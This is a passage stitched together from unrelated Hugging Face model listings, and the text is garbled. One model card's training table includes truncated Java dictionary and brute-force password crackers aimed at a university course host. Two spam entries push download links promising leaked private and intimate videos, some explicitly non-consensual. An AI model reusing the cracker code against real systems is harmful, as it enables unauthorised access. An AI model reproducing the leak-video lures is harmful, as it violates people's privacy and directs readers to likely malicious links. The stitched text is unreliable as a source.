System.err.println("IO Error " + ioe);\n }\n }\n\n private void createConnectionThread( int input )\n {\n data = new HoldSharedData( startTime, password, pwdCounter );\n\n int numOfThreads = input;\n int batch = pwdCounter/numOfThreads + 1;\n numOfThreads = pwdCounter/batch + 1;\n System.out.println("Number of Connection Threads Used=" + numOfThreads);\n ConnectionThread[] connThread = new ConnectionThread[numOfThreads];\n\n for( int index = 0; index < numOfThreads; index ++ )\n {\n connThread[index] = new ConnectionThread( url, index, batch, data );\n connThread[index].conn();\n }\n }\n} ', ] embeddings = model.encode(sentences) print(embeddings.shape) # [3, 512] # Get the similarity scores for the embeddings similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [3, 3] ``` <!-- ### Direct Usage (Transformers) <details><summary>Click to see the direct usage in Transformers</summary> </details> --> <!-- ### Downstream Usage (Sentence Transformers) You can finetune this model on your own dataset. <details><summary>Click to expand</summary> </details> --> <!-- ### Out-of-Scope Use *List how the model may foreseeably be misused and address what users ought not to do with the model.* --> <!-- ## Bias, Risks and Limitations *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.* --> <!-- ### Recommendations *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.* --> ## Training Details ### Training Dataset #### Unnamed Dataset * Size: 33,411 training samples * Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code> * Approximate statistics based on the first 1000 samples: | | sentence_0 | sentence_1 | label | |:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-----------------------------------------------| | type | string | string | int | | details | <ul><li>min: 52 tokens</li><li>mean: 444.58 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 52 tokens</li><li>mean: 470.35 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.80%</li><li>1: ~0.20%</li></ul> | * Samples: | sentence_0 | sentence_1 | label | |:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------| | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code><br><br>import java.io.*;<br>import java.*;<br>import java.net.*;<br>import java.util.*;<br><br>public class Dictionary {<br> public static void main (String[] args) throws IOException {<br> BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));<br><br> d = new Date().getTime();<br> FileReader fr = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader bufr = new BufferedReader(fr);<br> String word = bufr.readLine(); <br> int total = 960;<br> String[] pws = new String[total];<br> int count = 0;<br> while (word!=null){<br> if (word.length()<=3) { pws[count] = word; count++;}<br> word = bufr.readLine();<br> }<br> <br> int i=0;<br> int response = 0;<br> for (i=0;i<count;i++){<br> String uname = "";<br> String userinfo = uname + ":" + pws[i];<br> try{<br> String encoding = new bf.misc.BASE64Encoder().encode (userinfo.getBytes());<br> URL url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");<br> HttpURLConn...</code> | <code>0</code> | | <code><br>import java.io.*;<br>import java.util.*;<br><br><br>class BruteForce{<br><br>public static void main(String args[]){<br><br>String pass,s;<br>char a,b,c;<br>int z=0;<br>int attempt=0;<br>Process p;<br><br><br>char password[]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q',<br> 'R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h',<br> 'i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'};<br> z = System.currentTimeMillis();<br>int at=0;<br>for(int i=0;i<password.length;i++){<br> for(int j=0;j<password.length;j++){<br> for(int k=0;k<password.length;k++){<br> pass=String.valueOf(password[i])+String.valueOf(password[j])+String.valueOf(password[k]);<br><br> try {<br> System.out.println("Trying crack using: "+pass);<br> at++;<br><br><br> p = Runtime.getRuntime().exec("wget --http-user= --http-passwd="+pass+" http://sec-crack.cs.rmit.edu./SEC/2/index.php");<br> try{<br> p.waitFor();<br> }<br> catch(Exception q){}<br><br><br> z = p.exitValue();<br><br><br> ...</code> | <code><br>import java.io.*;<br>import java.util.Vector;<br>import java.util.Date;<br><br><br>interface UnaryPredicate {<br> boolean execute(Object obj);<br>}<br><br><br>public class DiffPrint {<br> <br> static String outFile="";<br><br> public static abstract class Base {<br> protected Base(Object[] a,Object[] b) {<br> try<br> {<br> outfile = new PrintWriter(new FileWriter(outFile)); <br> }<br> catch (Exception e)<br> {<br> e.printStackTrace();<br> }<br> file0 = a;<br> file1 = b;<br> }<br> <br> protected UnaryPredicate ignore = null;<br><br> <br> protected Object[] file0, file1;<br><br> <br> public void print_script(Diff.change script) {<br> Diff.change next = script;<br><br> while (next != null)<br> {<br> Diff.change t, end;<br><br> <br> t = next;<br> end = hunkfun(next);<br><br> <br> next = end;<br> end = null;<br> <br> <br><br> <br> print_hunk(t);<br><br> <br> end = next;<br> }<br> outfile.flush();<br> }<br><br> <br><br> protected Diff.change hunkfun(Diff.change hunk) {<br> ...</code> | <code>0</code> | | <code>package java.httputils;<br><br>import java.io.BufferedInputStream;<br>import java.io.BufferedOutputStream;<br>import java.io.BufferedReader;<br>import java.io.FileInputStream;<br>import java.io.FileNotFoundException;<br>import java.io.FileOutputStream;<br>import java.io.FileReader;<br>import java.io.IOException;<br>import java.io.OutputStream;<br><br><br>public class WatchDog<br>{<br> protected final int MILLIS_IN_HOUR = (60 * 60 * 1000);<br> protected int interval = 24;<br> protected String URL = "http://www.cs.rmit.edu./students/";<br> protected String fileName = "WatchDogContent.html";<br> protected String command = "./alert_mail.sh";<br> protected String savedContent;<br> protected String retrievedContent;<br><br> <br> public WatchDog()<br> {<br> super();<br> }<br><br> <br> public void run() throws Exception<br> {<br> HttpRequestClient client = null;<br> <br> <br> System.out.println(getClass().getName() +<br> "Retrieving baseline copy of: " + getURL());<br> client = new HttpRequestClie...</code> | <code><br><br>import java.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary<br>{<br> public String[] passwds;<br> public int passwdNum;<br> public static void main(String[] args) throws IOException<br> {<br> Dictionary dic=new Dictionary();<br> dic.doDictionary();<br> System.exit(1);<br> }<br><br> void doDictionary() throws IOException<br> {<br> Runtime rt=Runtime.getRuntime();<br> passwds=new String[32768];<br> passwdNum=0;<br><br> time1=new Date().getTime();<br> <br> try<br> {<br> File f = new File ("words");<br> FileReader fin = new FileReader (f);<br> BufferedReader buf = new BufferedReader(fin);<br> passwds[0]="00";<br> System.out.println(" loading words....");<br> <br> {<br> passwds[passwdNum]=buf.readLine();<br> passwdNum++;<br> }while(passwds[passwdNum-1]!=null);<br> System.out.println("Finish loading words.");<br> } catch (FileNotFoundException exc) {<br> System.out.println ("File Not Found");<br> } catch (IOException exc) {<br> System.out.println ("IOException 1");<br> } catch (NullPointerException exc) {<br> System.out.println ("NullPointerEx...</code> | <code>0</code> | * Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss) ### Training Hyperparameters #### Non-Default Hyperparameters - `per_device_train_batch_size`: 16 - `per_device_eval_batch_size`: 16 - `num_train_epochs`: 1 - `multi_dataset_batch_sampler`: round_robin #### All Hyperparameters <details><summary>Click to expand</summary> - `overwrite_output_dir`: False - `do_predict`: False - `eval_strategy`: no - `prediction_loss_only`: True - `per_device_train_batch_size`: 16 - `per_device_eval_batch_size`: 16 - `per_gpu_train_batch_size`: None - `per_gpu_eval_batch_size`: None - `gradient_accumulation_steps`: 1 - `eval_accumulation_steps`: None - `torch_empty_cache_steps`: None - `learning_rate`: 5e-05 - `weight_decay`: 0.0 - `adam_beta1`: 0.9 - `adam_beta2`: 0.999 - `adam_epsilon`: 1e-08 - `max_grad_norm`: 1 - `num_train_epochs`: 1 - `max_steps`: -1 - `lr_scheduler_type`: linear - `lr_scheduler_kwargs`: {} - `warmup_ratio`: 0.0 - `warmup_steps`: 0 - `log_level`: passive - `log_level_replica`: warning - `log_on_each_node`: True - `logging_nan_inf_filter`: True - `save_safetensors`: True - `save_on_each_node`: False - `save_only_model`: False - `restore_callback_states_from_checkpoint`: False - `no_cuda`: False - `use_cpu`: False - `use_mps_device`: False - `seed`: 42 - `data_seed`: None - `jit_mode_eval`: False - `use_ipex`: False - `bf16`: False - `fp16`: False - `fp16_opt_level`: O1 - `half_precision_backend`: auto - `bf16_full_eval`: False - `fp16_full_eval`: False - `tf32`: None - `local_rank`: 0 - `ddp_backend`: None - `tpu_num_cores`: None - `tpu_metrics_debug`: False - `debug`: [] - `dataloader_drop_last`: False - `dataloader_num_workers`: 0 - `dataloader_prefetch_factor`: None - `past_index`: -1 - `disable_tqdm`: False - `remove_unused_columns`: True - `label_names`: None - `load_best_model_at_end`: False - `ignore_data_skip`: False - `fsdp`: [] - `fsdp_min_num_params`: 0 - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False} - `fsdp_transformer_layer_cls_to_wrap`: None - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None} - `deepspeed`: None - `label_smoothing_factor`: 0.0 - `optim`: adamw_torch - `optim_args`: None - `adafactor`: False - `group_by_length`: False - `length_column_name`: length - `ddp_find_unused_parameters`: None - `ddp_bucket_cap_mb`: None - `ddp_broadcast_buffers`: False - `dataloader_pin_memory`: True - `dataloader_persistent_workers`: False - `skip_memory_metrics`: True - `use_legacy_prediction_loop`: False - `push_to_hub`: False - `resume_from_checkpoint`: None - `hub_model_id`: None - `hub_strategy`: every_save - `hub_private_repo`: None - `hub_always_push`: False - `gradient_checkpointing`: False - `gradient_checkpointing_kwargs`: None - `include_inputs_for_metrics`: False - `include_for_metrics`: [] - `eval_do_concat_batches`: True - `fp16_backend`: auto - `push_to_hub_model_id`: None - `push_to_hub_organization`: None - `mp_parameters`: - `auto_find_batch_size`: False - `full_determinism`: False - `torchdynamo`: None - `ray_scope`: last - `ddp_timeout`: 1800 - `torch_compile`: False - `torch_compile_backend`: None - `torch_compile_mode`: None - `include_tokens_per_second`: False - `include_num_input_tokens_seen`: False - `neftune_noise_alpha`: None - `optim_target_modules`: None - `batch_eval_metrics`: False - `eval_on_start`: False - `use_liger_kernel`: False - `eval_use_gather_object`: False - `average_tokens_across_devices`: False - `prompts`: None - `batch_sampler`: batch_sampler - `multi_dataset_batch_sampler`: round_robin </details> ### Training Logs | Epoch | Step | Training Loss | |:------:|:----:|:-------------:| | 0.2393 | 500 | 0.2122 | | 0.4787 | 1000 | 0.1686 | | 0.7180 | 1500 | 0.2193 | | 0.9574 | 2000 | 0.2084 | ### Framework Versions - Python: 3.11.13 - Sentence Transformers: 4.1.0 - Transformers: 4.52.4 - PyTorch: 2.6.0+cu124 - Accelerate: 1.7.0 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citation ### BibTeX #### Sentence Transformers ```bibtex @inproceedings{reimers-2019-sentence-bert, title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks", author = "Reimers, Nils and Gurevych, Iryna", booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing", month = "11", year = "2019", publisher = "Association for Computational Linguistics", url = "https://arxiv.org/abs/1908.10084", } ``` #### BatchAllTripletLoss ```bibtex @misc{hermans2017defense, title={In Defense of the Triplet Loss for Person Re-Identification}, author={Alexander Hermans and Lucas Beyer and Bastian Leibe}, year={2017}, eprint={1703.07737}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` <!-- ## Glossary *Clearly define terms in order to be accessible across audiences.* --> <!-- ## Model Card Authors *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.* --> <!-- ## Model Card Contact *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.* -->
barryallen16/Qwen2_5_1.5B_java_vul
barryallen16
2025-06-11T10:38:02Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:37:47Z
--- base_model: unsloth/qwen2.5-coder-1.5b-instruct-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** barryallen16 - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-coder-1.5b-instruct-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
meldynamics/whisper-large-v3-turbo-lithuanian-lithuania-0.06-cer-filtered-ggml
meldynamics
2025-06-11T10:38:01Z
0
0
null
[ "lt", "base_model:openai/whisper-large-v3-turbo", "base_model:finetune:openai/whisper-large-v3-turbo", "region:us" ]
null
2025-06-11T10:31:47Z
--- language: - lt base_model: - openai/whisper-large-v3-turbo --- # GGML version of [whisper-large-v3-turbo-lithuanian-lithuania-0.06-cer-filtered](https://huggingface.co/SamuelPfisterer1/whisper-large-v3-turbo-lithuanian-lithuania-0.06-cer-filtered)
ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-1000-v4
ibrahimbukhariLingua
2025-06-11T10:36:48Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-7B-Instruct", "base_model:finetune:Qwen/Qwen2.5-7B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:36:29Z
--- base_model: Qwen/Qwen2.5-7B-Instruct library_name: transformers model_name: qwen2.5-7b-en-wikipedia-finance-1000-v4 tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for qwen2.5-7b-en-wikipedia-finance-1000-v4 This model is a fine-tuned version of [Qwen/Qwen2.5-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-7B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-1000-v4", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
FarParsley4803/billie
FarParsley4803
2025-06-11T10:35:44Z
0
0
null
[ "region:us" ]
null
2025-06-11T10:33:50Z
🔴 ➤►DOWNLOAD👉👉🟢 ➤ <a href="https://subwayreh.cfd/wesrd">🌐(Full Original OMG video billie eilish & nat wolff! Leak Photos and video)
nishantbadhautiya/distilgpt2-finetuned-wikitext2
nishantbadhautiya
2025-06-11T10:34:26Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "gpt2", "text-generation", "generated_from_trainer", "base_model:distilbert/distilgpt2", "base_model:finetune:distilbert/distilgpt2", "license:apache-2.0", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:03:40Z
--- library_name: transformers license: apache-2.0 base_model: distilgpt2 tags: - generated_from_trainer model-index: - name: distilgpt2-finetuned-wikitext2 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # distilgpt2-finetuned-wikitext2 This model is a fine-tuned version of [distilgpt2](https://huggingface.co/distilgpt2) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 3.6425 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 8 - eval_batch_size: 8 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3.0 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:-----:|:----:|:---------------:| | 3.7194 | 1.0 | 2334 | 3.6663 | | 3.6195 | 2.0 | 4668 | 3.6462 | | 3.5733 | 3.0 | 7002 | 3.6425 | ### Framework versions - Transformers 4.52.4 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF
Triangle104
2025-06-11T10:34:12Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1B-A0.6B", "base_model:quantized:huihui-ai/Huihui-MoE-1B-A0.6B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:33:56Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1B-A0.6B library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo --- # Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1B-A0.6B`](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q8_0-GGUF --hf-file huihui-moe-1b-a0.6b-q8_0.gguf -c 2048 ```
albertuspekerti/whispertiny_fruit25syl_v4
albertuspekerti
2025-06-11T10:33:54Z
0
0
null
[ "tensorboard", "safetensors", "whisper", "generated_from_trainer", "base_model:openai/whisper-tiny", "base_model:finetune:openai/whisper-tiny", "license:apache-2.0", "region:us" ]
null
2025-06-11T07:15:26Z
--- license: apache-2.0 base_model: openai/whisper-tiny tags: - generated_from_trainer metrics: - wer model-index: - name: whispertiny_fruit25syl_v4 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # whispertiny_fruit25syl_v4 This model is a fine-tuned version of [openai/whisper-tiny](https://huggingface.co/openai/whisper-tiny) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 0.0374 - Wer: 6.2478 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-05 - train_batch_size: 16 - eval_batch_size: 8 - seed: 42 - optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08 - lr_scheduler_type: linear - lr_scheduler_warmup_steps: 500 - training_steps: 36000 - mixed_precision_training: Native AMP ### Training results | Training Loss | Epoch | Step | Validation Loss | Wer | |:-------------:|:------:|:-----:|:---------------:|:-------:| | 0.089 | 0.0556 | 2000 | 1.2236 | 47.3019 | | 0.0835 | 0.1111 | 4000 | 0.1329 | 17.4939 | | 0.1248 | 0.1667 | 6000 | 0.1373 | 14.6178 | | 0.1632 | 0.2222 | 8000 | 0.9112 | 42.7714 | | 0.0491 | 0.2778 | 10000 | 0.4560 | 36.9773 | | 0.056 | 0.3333 | 12000 | 0.1123 | 10.3316 | | 0.0373 | 0.3889 | 14000 | 1.4490 | 51.2600 | | 0.0107 | 0.4444 | 16000 | 0.7076 | 39.3159 | | 0.0345 | 1.0049 | 18000 | 0.0647 | 6.7365 | | 0.0159 | 1.0605 | 20000 | 0.7125 | 32.8935 | | 0.004 | 1.1161 | 22000 | 1.1897 | 43.9372 | | 0.0074 | 1.1716 | 24000 | 0.0466 | 6.0244 | | 0.0023 | 1.2272 | 26000 | 0.7663 | 34.8970 | | 0.0044 | 1.2827 | 28000 | 0.5099 | 31.9442 | | 0.0065 | 1.3383 | 30000 | 0.0191 | 2.5899 | | 0.0007 | 1.3938 | 32000 | 0.5589 | 30.4433 | | 0.0006 | 1.4494 | 34000 | 0.3183 | 23.8743 | | 0.0472 | 2.0099 | 36000 | 0.0374 | 6.2478 | ### Framework versions - Transformers 4.41.2 - Pytorch 2.3.0+cu121 - Datasets 2.19.1 - Tokenizers 0.19.1
LongJumping/Whitne
LongJumping
2025-06-11T10:32:50Z
0
0
null
[ "region:us" ]
null
2025-06-11T10:23:01Z
Watch 🟢 ➤ ➤ ➤ 🌐<a href="https://ahdnews.cfd/AWFSF>Full Original Video bu guru salsa bu guru salsa tiktok) 🔴 ➤►DOWNLOAD👉👉🟢 ➤ 🌐<a href="https://ahdnews.cfd/AWFSF>(Full Original Video bu guru salsa bu guru salsa tiktok) 🔴 ➤►DOWNLOAD👉👉🟢 ➤ <a href=https://ahdnews.cfd/AWFSF>🌐(Full Original Video bu guru salsa bu guru salsa tiktok) Full Original Video bu guru salsa bu guru salsa tiktok bu guru salsa Viral Video Full Original Video Viral link On Social Media X TikTok Trending Now New Viral Video Original Video Link Leaked Original Video Viral On Social Media the internet by storm and amazed viewers on various social media platforms. Who Is Viral ? TikTok Star Deactivates Social Media Accounts After Private Video Leaks Online TikToker Viral is currently facing intense trolling after her explicit videos went viral on social media. Viral Video Original Video Link Leaked video took the internet by storm and amazed viewers on various social media platforms. Viral Video Original Video Link Leaked, a young and talented digital creator, recently became famous thanks to this interesting video. The Viral Video Original Video Link 2024 viral video serves as a testament to the power of social media to amplify voices and spark change. It highlights the importance of authentic storytelling and the ability to connect with audiences on a deep emotional level. As the video continues to inspire and empower viewers, Viral Video Original Video Link’s legacy as a viral sensation and advocate for [relevant social issue] will undoubtedly endure. The Viral Video on Twitter has garnered immense attention across social media platforms. This article aims to guide you on how to watch the video safely and responsibly. Aku paham kalau kamu ingin tahu lebih banyak tentang video viral tersebut, tapi saya harus ingatkan untuk berhati-hati dalam mencari dan membagikan konten yang melibatkan privasi orang lain. Terutama kalau itu menyangkut hal-hal pribadi atau bisa berdampak buruk bagi orang yang terlibat. Video yang sedang viral seringkali bisa menimbulkan efek yang besar bagi orang yang terlibat, baik positif maupun negatif. Kalau kamu penasaran atau ingin tahu lebih banyak tentang dampak media sosial, atau bahkan ingin ngobrol tentang etika di dunia maya, saya bisa bantu jelaskan lebih lanjut. Tapi soal video dan link terkait yang kamu sebutkan, saya sarankan untuk menghindari menyebarkannya, demi menghormati privasi semua pihak yang terlibat. Selain itu, di platform YouTube, terdapat video berjudul "ORA PAKDE AMPUN PAKDE V1R4L T1KT0K" yang diunggah oleh Puthjeck666. Video ini menampilkan kompilasi momen-momen lucu dengan latar belakang musik yang sedang tren, dan frasa "ampun pakde" menjadi semacam punchline dalam video tersebut. Di Facebook, frasa ini juga digunakan dalam berbagai konten, seperti yang terlihat dalam video yang diunggah oleh Selin Kayra dengan judul "Ampun Pakde #Reals #Fyp #Fbpro #Viral". Video ini menampilkan adegan-adegan yang mengundang tawa, diakhiri dengan ungkapan "ampun pakde". Meskipun popularitas frasa ini meningkat, informasi mengenai asal-usul dan makna sebenarnya dari "ampun pakde" masih terbatas. Namun, penggunaan frasa ini dalam berbagai konten humor menunjukkan bahwa "ampun pakde" telah menjadi bagian dari tren budaya populer di media sosial Indonesia. Watch full viral ampun pakde video En las últimas horas un video íntimo de la creadora de contenido para adultos y también participante del actual reality Isla de las Tentaciones, donde actualmente enfrenta una fuerte polémica, tras filtrarse un video íntimo con el actor Miiki León. Según varios de sus seguidores en internet la filtracion se produjo después que la participante contara a Marina López que su novio Fran le fue infiel, antes de ir al programa y que en reiteradas ocasiones mantuvo relaciones sexuales a espaldas de Ana. ¿Dónde ver el video filtrado de Ana Luiza? El video de Olivia Romano está circulando en redes sociales, principalmente en sitios de contenido para adultos, donde el Ana Luiza y Miiky León se muestran manteniendo un encuentro sexual en una habitación. Este material fue filtrado inicialmente en la plataforma de Super Por, donde filtraron el clip con una descripción que sugiere ser bastante explicita, aunque el clip no está completo ha sido suficiente para poner el nombre de Ana Luiza en manifiesto. ¿El video filtrado de Ana Luiza es real? Aunque algunos internautas cuestionan la autenticidad del material, podría tratarse de algo real, ya que Ana Luiza o mejor conocida como OliviaRoomano es una popular creadora de contenido en OnlyFans. Es por ello que todos apuntan a que esto si se trata de una filtracion verdadera, y que el clip que circula en redes sociales es real. Cabe destacar que la filtracion de contenido explicito sin el consentimiento de las personas involucradas es penado por la Ley y se paga con años de cárcel y multas. ¿Cómo ver el clip filtrado de OliviaRoomano? A raíz de la difusión del material explicito han comenzado a surgir múltiples enlaces que sugieren contener el video íntimo de los creadores de contenido que sugieren contener el material, sin embargo, es importante tomar precaución antes de ingresar a este material.
lindsaybordier/DPO_final-dataset_not-robust_acc1_beta0.10
lindsaybordier
2025-06-11T10:32:02Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:Qwen/Qwen3-0.6B-Base", "base_model:finetune:Qwen/Qwen3-0.6B-Base", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T08:38:09Z
--- base_model: Qwen/Qwen3-0.6B-Base library_name: transformers model_name: DPO_final-dataset_not-robust_acc1_beta0.10 tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for DPO_final-dataset_not-robust_acc1_beta0.10 This model is a fine-tuned version of [Qwen/Qwen3-0.6B-Base](https://huggingface.co/Qwen/Qwen3-0.6B-Base). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="lindsaybordier/DPO_final-dataset_not-robust_acc1_beta0.10", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/lindsaybordier-epfl/MNLP_DPO_M3/runs/uuct020b) This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.18.1 - Transformers: 4.51.3 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = 